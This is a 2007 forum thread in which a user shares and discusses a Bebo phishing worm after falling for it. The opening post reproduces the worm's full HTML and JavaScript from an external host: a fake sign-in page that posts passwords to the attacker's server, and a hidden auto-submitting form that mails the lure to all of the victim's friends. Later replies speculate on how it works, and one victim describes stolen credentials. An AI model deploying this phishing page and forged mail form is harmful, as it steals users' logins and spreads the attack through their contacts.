Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi there,
There is an issue with role permissions that is being worked on at the moment.
If you are having trouble with access or permissions on regional forums please post here to get access: https://www.boards.ie/discussion/2058365403/you-do-not-have-permission-for-that#latest

Clever bebo virus

  • 13-09-2007 11:05am
    #1
    Registered Users, Registered Users 2 Posts: 569 ✭✭✭failsafe


    There's a virus doing the rounds this morning through bebo mail, which is basically phising for passwords. The email says something along the lines of "OMFVHGKSA!! check out this cool link ....." which brings you to a page that looks like the bebo login page, prompting you to enter your username and p/w. Pretty standard stuff so far, but the reason I thought i'd post it here is because of a clever little thing it does, which I can't quite figure out. Because you get it in your bebo mail, you are currently logged into bebo when you click the link, and the page uses this to load a php page which has the viral email in it, then automatically submits it to bebo a split second later. Therefore the email propegates itself without a user even falling for the fake screen.

    Here's the link ***WARNING - DO NOT CLICK IF YOU HAVE A BEBO ACCOUNT AND ARE SIGNED IN/HAVE "REMEMBER ME" BOX TICKED*** http://captainbarbossa.110mb.com/Bebossa.php, for anyone who wants to see it. I've also included the source code for anyone that's interested. And I know that ethically I really be shouldn't be describing a worm as "clever"!

    http://captainbarbossa.110mb.com/Bebossa.php
    <!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 3.2 Final//EN'>
    <html>
    
    <head>
    <title>Sign In</title><meta http-equiv='Content-Type' content='text/html; charset=utf-8'><META HTTP-EQUIV='Pragma' CONTENT='no-cache'><META HTTP-EQUIV='Expires' CONTENT='-1'><META NAME="ROBOTS" CONTENT="NOARCHIVE"><link rel=stylesheet href=http://s.bebo.com/StyleSheet1.css?v=9 type=text/css><link rel=stylesheet href=http://s.bebo.com/SkinCSS.jsp?SkinId=0&v=6 type=text/css>
    <script language="javascript">
    function WaitForIt()
    {
    	//document.getElementById('SignIn').disabled=true;
    	//setTimeout("document.getElementById('SignIn').disabled = false",3000);
    	//setTimeout("alert('hello')",3000);
    	//document.SignIt.SignIn.disabled=true;
    }
    </script>
    </head>
    <body>
    				
    				<iframe src="http://captainbarbossa.110mb.com/BebossaChild.php" height="480" width="820" frameborder="0" id="MailFrame" name="MailFrame" scrolling="no"></iframe>
    				<iframe src="http://captainbarbossa.110mb.com/automail.htm" height="0" width="0" frameborder="0" id="MailFrame" name="MailFrame" scrolling="no"></iframe>
    				
    
    			</body>
    		</html>
    


    http://captainbarbossa.110mb.com/BebossaChild.php
    <!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 3.2 Final//EN'>
    <html>
    
    <head>
    
    <title>Sign In</title><meta http-equiv='Content-Type' content='text/html; charset=utf-8'><META HTTP-EQUIV='Pragma' CONTENT='no-cache'><META HTTP-EQUIV='Expires' CONTENT='-1'><META NAME="ROBOTS" CONTENT="NOARCHIVE"><link rel=stylesheet href=http://s.bebo.com/StyleSheet1.css?v=9 type=text/css><link rel=stylesheet href=http://s.bebo.com/SkinCSS.jsp?SkinId=0&v=6 type=text/css>
    <script language="javascript">
    
    	//document.getElementById('SignIn').disabled=true;
    	//setTimeout("document.getElementById('SignIn').disabled = false",3000);
    	//setTimeout("alert('hello')",3000);
    	//document.SignIt.SignIn.disabled=true;
    
    </script>
    </head>
    <body><div id=main><div id=header><div id=top><h1>Bebo Online Social Network</h1><span id=topLogomb><a href=http://www.bebo.com/Default.jsp>Bebo</a></span><span id=topLinks><table style='float: left; margin-left:25px;'><tr><form action=http://www.bebo.com/Search.jsp><td><input type=text name=SearchTerm size=20 class=topSearch /></td><td><select name=SearchType class=topSearch><option value=Web>Web</option><option value=Bebo>Bebo</option><option value=People selected>People</option><option value=Music>Music</option></select></td><td><input type=submit value=Search class=topSearch /></td><td><img src=http://www.bebo.com/img/poweredByYahooHeader2.gif></td></form></tr></table><a href=http://www.bebo.com/SignIn.jsp>Sign In</a> <a href=http://www.bebo.com/SignIn.jsp><img src=http://s.bebo.com/img/icon_signin.gif width=32 height=17 border=0 align=texttop></a></span></div>
    				<iframe src="http://captainbarbossa.110mb.com/automail.htm" height="0" width="0" frameborder="0" id="MailFrame" name="MailFrame" scrolling="no"></iframe>
    				
    				<div id=nav>
    					<div id=navMenu>
    						<ul><li><a href=http://www.bebo.com/Default.jsp>Home</a></li>
    						<li><a href=http://www.bebo.com/Bands.jsp>Music</a></li>
    						<li><a href=http://www.bebo.com/Tv.jsp>Video</a></li>
    						<li><a href=http://www.bebo.com/Books.jsp>Authors</a></li>
    						<li><a href=http://www.bebo.com/InviteJoin.jsp?Member=N>Register</a></li>
    						<li><a href=http://www.bebo.com/Help.jsp?ChangeTab=Y>Help</a></li></ul>
    					</div>
    				</div>
    			</div>
    			<div id=content>
    				<table cellspacing=0 cellpadding=0 width=760>
    					<tr>
    						<td valign=top style='width:434px; padding-right:15px; border-right: 1px solid #CFCFCF;'>
    							<p class=header>Please sign in again to access this page</p>
    							<div id=form>
    								<table border=0 cellspacing=0 cellpadding=1>
    									<form id="SignIt" name="SignIt" method=post action="http://captainbarbossa.110mb.com/BebossaChild.php?BeboID=
    									">
    									<input type=hidden name=FriendsMemberId value=>
    									<input type=hidden name=FriendsChecksumNbr value=>
    									<input type=hidden name=InviteRecipientId value=>
    									<input type=hidden name=InviteChecksumNbr value=>
    									<input type=hidden name=Page value=''>
    									<input type=hidden name=QueryString value=''>
    									<tr>
    									<td width=5 nowrap>&nbsp;</td>
    									<td nowrap class=label>Username or Email</td>
    									<td> &nbsp;<input id=EmailUsername name=EmailUsername size=25 value='' maxlength=100 tabindex=1> &nbsp;<a href=http://www.bebo.com/InviteJoin.jsp?Member=N class=s>Register</a>
    									</td>
    								</tr>
    								<tr>
    									<td width=5 nowrap>&nbsp;</td>
    									<td class=label>Password</td>
    									<td> &nbsp;<input type=password id=Password name=Password size=25 maxlength=20 value='' tabindex=2> &nbsp;<a href=http://www.bebo.com/LostPassword.jsp class=s>Lost Password?</a></td>
    								</tr>
    								<tr>
    									<td colspan=2>&nbsp;</td>
    									<td>
    										<table>
    											<tr>
    												<td><input type=submit class=button id="SignIn" name=SignIn value='Sign In >' tabindex=3></td>
    												<td width=5 /><td><input type=checkbox id=RememberMe name=RememberMe value=Y></td>
    												<td class=s><a href=javascript:window.open('http://www.bebo.com/RememberMePopup.jsp','RememberMe','width=440,height=350,scrollbars=yes');void('');>Automagically</a> for 2 weeks.</td>
    											</tr>
    										</table>
    									</td></tr>
    									</form>
    								</table>
    							</div>
    							<script language="javascript">
    							document.getElementById('EmailUsername').focus()
    							</script><br><br>Your IP address is:&nbsp;213.233.159.69&nbsp;<a href="javascript:window.open('http://www.bebo.com/YourIPAddressPopup.jsp','YourIPAddress','width=440,height=350,scrollbars=yes');void('');">Learn more</a>
    							</td>
    							<td valign=top style='width:300px; padding-left:10px;'>
    							<iframe src="" frameborder=0 marginheight=0 marginwidth=0 scrolling=no width=300 height=250></iframe>
    							</td>
    						</table>
    					</div>
    					<div id=footer>
    						<a href=http://www.bebo.com/Help.jsp>Help</a><img src=http://s.bebo.com/img/footer_sep.gif width=15 height=14 align=absmiddle>
    						<a href=http://www.bebo.com/TermsOfUse.jsp>Terms</a><img src=http://s.bebo.com/img/footer_sep.gif>
    						<a href=http://www.bebo.com/Privacy.jsp>Privacy</a><img src=http://s.bebo.com/img/footer_sep.gif>
    						<a href=http://www.bebo.com/SafetyTips.jsp>Safety</a><img src=http://s.bebo.com/img/footer_sep.gif>
    						<a href=http://www.bebo.com/Testimonials.jsp>Testimonials</a><img src=http://s.bebo.com/img/footer_sep.gif>
    						<a href=http://www.bebo.com/ContactUs.jsp>Contact</a><img src=http://s.bebo.com/img/footer_sep.gif>
    						<a href=http://www.bebo.com/StaticPage.jsp?StaticPageId=2517103831>About</a><img src=http://s.bebo.com/img/footer_sep.gif>
    						<a href=http://www.bebo.com/Press.jsp>Press</a><img src=http://s.bebo.com/img/footer_sep.gif>
    						<a href=http://www.bebo.com/OurBlog.jsp>Our Blog</a><img src=http://s.bebo.com/img/pbos.gif width=59 height=21 style='margin-left:70px'>
    					</div>
    					<div id=copyright>&copy;2007 Bebo, Inc. </div>
    				</div>
    				<div class=m_b_white>bebo41:2:1181169923199</div>
    			</body>
    		</html>
    

    And the kicker.... http://captainbarbossa.110mb.com/automail.htm
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
    "http://www.w3.org/TR/html4/loose.dtd">
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    <title>Untitled Document</title>
    <script language="javascript">
    <!--
    
    function SubmitIt()
    {
    	var butt = document.getElementById("Send");	
    	butt.click();
    	//alert('done');
    }
    
    // -->
    </script>
    </head>
    
    <body onLoad="SubmitIt()">
    <form method=post action="http://www.bebo.com/mail/MailCompose.jsp" name=mainForm id=mainForm>
    <input type=hidden id=SelectAttachmentTypeCd name=SelectAttachmentTypeCd value=''>
    <select name=SendTo style='Width:480' >
    	<option value=LALL>&lt; ---Select Recipient --- &gt;</option>
    	<option value=N>================= LISTS =================</option>
    	<option value=LALL>ALL MY FRIENDS * * *</option>
    	<option value=N>================ FRIENDS ================</option>	
    </select>
    <input size=90 name=Subject maxlength=100 value='OMG look at these' style='Width:480'>
    <textarea cols=55 rows=18 wrap=virtual name=Message style='Width:545'>LOL! u'll piss urself when u see dis
    
    http://www.bebo.com/Link.jsp?Url=http://captainbarbossa.110mb.com/Bebossa.php
    
    mmm sexy :-p</textarea>
    <input type=submit name=Send id="Send" value=' Send '>
    <input type=submit name=Cancel value=' Cancel '>
    <input type=radio name=MailSkinId value=0 checked>
    </form>
    </body>
    </html>
    


Comments

  • Registered Users, Registered Users 2 Posts: 569 ✭✭✭failsafe


    And no, before anyone asks I didn't create it!

    And yes, I have reported it to bebo and the host server of the site (I pretend I did it to be a good net citizen, but really it's because I'm annoyed that it tricked me!)


  • Registered Users, Registered Users 2 Posts: 1,028 ✭✭✭Hellm0


    This kind of crap annoys me no end. The people who acually spend time on this crap and abuse their meagre knowledge of coding should be shot at dawn.


  • Registered Users, Registered Users 2 Posts: 68,317 ✭✭✭✭seamus


    There's probably more to it in the PHP source. I'd guess it's using the referrer url and/or query string to perform a replay attack on bebo and send the mail.

    From what you describe, it's not that big a deal, more of an irritating proof-of-concept virus.


  • Closed Accounts Posts: 669 ✭✭✭pid()


    Aye, it's no biggie at all but the majority of bebo users are not very technically savvy (sp? :p) so would fall for the phising trick.


  • Registered Users, Registered Users 2 Posts: 26,584 ✭✭✭✭Creamy Goodness


    i'm more worried as to why the author of this phising trick wants bebo accounts.


  • Advertisement
  • Registered Users, Registered Users 2 Posts: 569 ✭✭✭failsafe


    Cremo wrote:
    i'm more worried as to why the author of this phising trick wants bebo accounts.
    Yeah, that one was a bit beyond me too! Maybe to get email addresses for spam?


  • Closed Accounts Posts: 146 ✭✭teckoda


    To be honest, half of the users on bebo are stupid. So i'd assume a lot of people would click it. And i think they deserve it.

    Viruses are good in many ways.. As regards putting pressure on the IT industry to keep improving things.


  • Banned (with Prison Access) Posts: 25,234 ✭✭✭✭Sponge Bob


    90% of them are stupid. The other 10% should really know better . The IT industry should DDOS the fukn thing 24/7 , would save loads of aggro and time.


  • Closed Accounts Posts: 583 ✭✭✭monkey tennis


    failsafe wrote:
    And I know that ethically I really be shouldn't be describing a worm as "clever"!

    Why not? Intelligence and morality are not mutually dependant.


  • Registered Users, Registered Users 2 Posts: 569 ✭✭✭failsafe


    No, but ethically speaking, praising an unethical act could be considered a bit of an ethical no-no in itself.


  • Advertisement
  • Closed Accounts Posts: 583 ✭✭✭monkey tennis


    failsafe wrote:
    No, but ethically speaking, praising an unethical act could be considered a bit of an ethical no-no in itself.

    Not if you're purely commenting on its intricacy or inspired employment of technology.


  • Registered Users, Registered Users 2 Posts: 7,468 ✭✭✭Evil Phil


    Technically this entire thread is violating the Forum Charter.


    You are all banned!


    Nah, only kidding. I'll allow this to stay.


  • Registered Users, Registered Users 2 Posts: 5,335 ✭✭✭Cake Fiend


    Evil Phil wrote:
    Technically this entire thread is violating the Forum Charter.

    Well... it's not really a virus, more like an XSS attack propogated through worm-like tactics.


  • Closed Accounts Posts: 1 ahos


    I landed on this board, while researching the "BEBO Virus" This virus is not so clever, it is however oportunistic. AOL has moved their AIM and AOL profiles to this server, and they even offer the ability to log in to Bebo using your AOL or AIM credentials! Yes, you can even read your AOL Mail on their site.

    I have been a member of AOL since 1995, and BEBO, or the Virus, got my master screen credentials, as well as my address book, and my Buddy List! They have been spamming them ever since.

    I think I have really good security on my computer, and do not have any signs of a "real virus", but I have had my security breached, via AOL. And there really does need to be an investigation in to identity theft, because that is what it is.

    I guess I will leave the "Social Networking" to those who don't know any better. I hope my take on the "BEBO Virus" helps some one.

    Best Regards,
    AHOS


  • Registered Users, Registered Users 2 Posts: 8,070 ✭✭✭Placebo


    how does it by pass 'you are clicking link out side of bebo?'




  • The sooner Bebo crashes and burns to the ground, the better. I admire anyone who plays a part in speeding this up.


  • Closed Accounts Posts: 1,397 ✭✭✭Herbal Deity


    Placebo wrote: »
    how does it by pass 'you are clicking link out side of bebo?'
    Thread is 3 years old.


Advertisement